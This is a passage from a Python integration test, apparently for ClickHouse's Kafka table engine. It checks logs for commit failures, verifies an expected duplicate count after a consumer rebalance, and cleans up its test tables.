# Since it's a bit tricky to hit the proper moment, check the logs to confirm that we did.
assert instance.contains_in_log("Local: Waiting for coordinator")
assert instance.contains_in_log("All commit attempts failed")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# After https://github.com/edenhill/librdkafka/issues/2631, the timeout triggers a rebalance,
# making further commits to the topic impossible after getting back online. So we end up with
# duplicates in that scenario, but we report the situation properly.
assert TSV(result) == TSV('42\t22\t22')
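# A query to inspect the duplicates this test expects (same spirit as the debug queries in
# the rebalance test above; illustrative only, and it would have to run before the
# DROP TABLE statements above, since test.view is gone by this point):
# SELECT key, count() AS copies FROM test.view GROUP BY key HAVING copies > 1 ORDER BY key;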
if __name__ == '__main__':
    cluster.start()
    input("Cluster created, press Enter to destroy...")
    cluster.shutdown()